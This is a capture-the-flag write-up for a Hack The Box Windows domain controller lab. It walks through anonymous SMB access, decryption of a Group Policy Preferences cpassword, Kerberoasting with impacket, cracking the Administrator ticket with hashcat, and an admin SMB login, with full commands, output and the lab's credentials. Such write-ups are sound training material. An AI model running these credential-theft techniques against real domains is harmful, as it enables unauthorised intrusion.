HTB:Active Write-Up

Target Machine Information:

· Hostname : ACTIVE

· IP Address : 10.10.10.100

· OS : Windows

RECON:

sudo bash nmapAutomator 10.10.10.100 Basic
# Nmap 7.91 scan initiated Tue May 11 17:21:47 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.100.nmap --dns-server=1.1.1.1 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.069s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-11 21:23:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 1m51s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-11T21:24:43
|_  start_date: 2021-05-11T20:50:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 17:22:59 2021 -- 1 IP address (1 host up) scanned in 72.54 seconds

ENUMERATION:

enum4linux -a 10.10.10.100

sudo smbclient //10.10.10.100/Replication -U ""%""

After login we navigate to the following directory and get the Groups.xml file

smb: \> cd active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)

We then go back to our attack machine to view the Groups.xml file. In the file we get a hash where it says “cpassword”

cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

After pasting it into Google we see that we can decrypt it using gpp-decrypt.

┌──(kali㉿kali)-[~/Desktop/nmapAutomator/10.10.10.100]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ 
GPPstillStandingStrong2k18

And we get the following output → GPPstillStandingStrong2k18

Also in our Groups.xml file we can see that the user is “SVC_TGS”

So with these credentials lets try and use smbmap to see what we have access to.

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

smbmap

We can then use smbclient to login and navigate to find our user.txt

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

get user.txt
┌──(root💀kali)-[~]
└─# cat user.txt      
86d67d....

PRIVILEGE ESCALATION:

Since we saw that port 88 is running kerberos we can go ahead and try to find a kerberos ticket of the Admin and crack it to find our admin credentials.

1. Grab “GetUserSPN.py” from the impacket directory and paste it somewhere you can use it.

locate GetUserSPN.py
cp ../../GetUserSPN.py .

2. Now let run it.

python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPN.out                                                                                                                       

3. We get a hash

┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat GetUserSPN.out 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$54a8d2b2ecc2b0e7133a4859603299ca$4b3c7d8d46c5de380060e507672863e4c52768b06445d906c989746c74a32ee25fd9dd3afb3817e14db22be2aca654ee4e6b929a8b1e273208c0079b53aab280710659c3eb3e63c6e4f6733015287734a15a90e96a267b6ab2d642881d45b396c9ccfc7a207cbe4b2f2df98174b2b76984e885ce87cdbbeeb3642e01fd363c499d67c461e2d6a1b1743e533f5788bd69f726f4a8e7c22f3f2ce786212abff34685ea09192daf36d6fd05992aa158470c3d53fa7835ce22a90ea8a2fe044fe4ce7c7c19692cb25f58aa1aeb8af0859960f2d9c34bb0c7acc9aadb1d0790cb67c339dca5e3ab2bc902fa5f50424a2b67d2f499971f179c1076b9b531bdead3b2fdfddc2f57693a4105a8f3643cd68c1182f39a0a94fc0992dafd203d7aa516cfe50915d75753690e2b27fc5325c549559c727dc682fb34031bb5d98a88623cf9c04b6cff9339cf5ceb64bd49ba33efd47c0a9557f72f632d5d322e9ecdc3cc69637063f672621e895861ef079b698b26304cb5ad0826ee30a8186b4158b08113c209a6a9b0ce2048a644c03be6158607f2eb767f4b06d095d3528b141d709d051678f446718b4a85614b3cb5d6adb87769bc438b4c44d10368016d23b4a106423c5a27b458967f917e42c3804171d4294734ecb537024e930030fdf8e54a8c00bf650fd26160a20887c38422051fcfbb5ca03b60a85d9a17b6a9d12a151e700b93e2f574eea7f1a9e26b5b0298a9fd8262ec35abb33d4935d1457745ac1a4461f3bef9441265c6532f7f0ab79b752efa85f78fb475522d0c3320aa0880d76027faf92623863bfe0389f880c2ca03ea3dbe191cff5b4cf5a4ca9ae1ee05f1700e63ea5b2dd758943d49ced44ef5ae55ac99cac7ea864d956d8e63ab695b6e76eb0d4762999ec138a5faffe82ec36fdf46043571317fd25edcf354d1b2b4b4c2ea5fa83c831b6f4aeb3573beff7858ef66c59e81d19bc742a95a03af12ec71f2e9e7883a79ba47870c76801b4a6287d8ec3b862f8623d87e3e1d211eedacaaf5cc0658768057bb48438ee06768a2992fd886d39c92e142421ec6ac927a1bd22b7bf19a1b2430d4991a17dc29a3e47124ea8dbb44c2254219db75ee7fea6d9d99ba5d3945ec67a255a6600eebdd1ae280887057903153ff09e018d315de0e90b2f565ad8449ecc17fe364f139ddd8a3f5673035e445ac3cfe573ba5406d5dd476da1bddbd35e47654acc81910dacbfcd9cfaec0f177c54d788b2c5d31

4. After some googling we find that in a kerberoasting attack the hash is

→13100 | Kerberos 5, etype 23, TGS-REP ←

5. So our attack will be formatted like the following.

hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O

We get our cracked hash

hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O --show
...c5d31:Ticketmaster1968

6. So now let’s locate and copy smbclient and try and login as admin

cp /opt/impacket/examples/smbclient.py .
python3 smbclient.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.23.dev1+20210127.141011.3673c588 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Sat Jul 21 10:39:20 2018 .
drw-rw-rw-          0  Sat Jul 21 10:39:20 2018 ..
drw-rw-rw-          0  Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw-          0  Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw-          0  Mon Jul 16 17:08:47 2018 Default
drw-rw-rw-          0  Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw-        174  Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw-          0  Mon Jul 16 17:08:47 2018 Public
drw-rw-rw-          0  Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Administrator
# cd Desktop
# get root.txt
# exit
──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat root.txt                            
b5fc76d1...

Rooted and scooted!